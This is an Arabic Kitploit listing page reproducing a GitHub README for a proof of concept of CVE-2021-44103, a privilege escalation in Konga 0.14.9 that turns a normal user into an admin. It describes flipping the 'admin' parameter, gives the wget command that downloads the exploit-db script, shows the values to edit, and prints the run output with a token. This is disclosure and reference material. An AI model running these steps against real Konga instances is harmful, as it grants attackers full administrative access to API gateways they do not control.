Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-44103 | Kitploit
أدوات/GitHubGitHub/paulotrindadec/cve-2021-44103
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمن واجهات برمجة التطبيقات
GitHubpaulotrindadec/cve-2021-44103

CVE-2021-44103

عرض المستودع
3منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-44103

إثبات مفهوم لـ KONGA 0.14.9 - تصعيد الامتيازات.

مقدمة

في 16 نوفمبر 2021، اكتشفت أنا وفابريسيو سالوماو ثغرة أمنية في بوابات Konga API، تسمح لأي مستخدم مُصادَق بأن يصبح مسؤولًا.

الإبلاغ عن الثغرة

المنتج: KONGA
الطراز: 0.14.9
الثغرة: تصعيد الامتيازات
الأثر: وصول كامل كمسؤول (تصعيد امتيازات عمودي)
المصادقة: مطلوبة
مؤلف الاستغلال: Fabricio Salomao / Paulo Trindade

إثبات المفهوم

بالأسفل تم إنشاء مستخدم عادي باسم "usernormal" بدون صلاحيات.

لقطة

لقطة

من خلال الطلب بالأسفل، تم تغيير العلامة "FALSE" في المعامل "admin" إلى "TRUE".

لقطة

لذلك تم إنشاء استغلال لنا: https://www.exploit-db.com/exploits/50521

لقطة

بعد تشغيل الاستغلال، نجحت عملية تصعيد الامتيازات!

النتيجة:

لقطة

تشغيل الاستغلال

root@kitploit:~
wget https://www.exploit-db.com/raw/50521 -O 50521.py

Edit 50521.py

Modify:

urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga"            # change user
password = "changeme"                     # change password

Execute:

python 50521.py

[+] Attack
[+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
[+] Change Normal User to Admin
[+] Success

الروابط

http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html

https://www.exploit-db.com/exploits/50521

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103

https://github.com/advisories/GHSA-f2mp-8fgg-7465

https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821

https://twitter.com/CVEnew/status/1508455166885961732

https://twitter.com/search?q=CVE-2021-44103&src=typed_query

تنزيل الأداة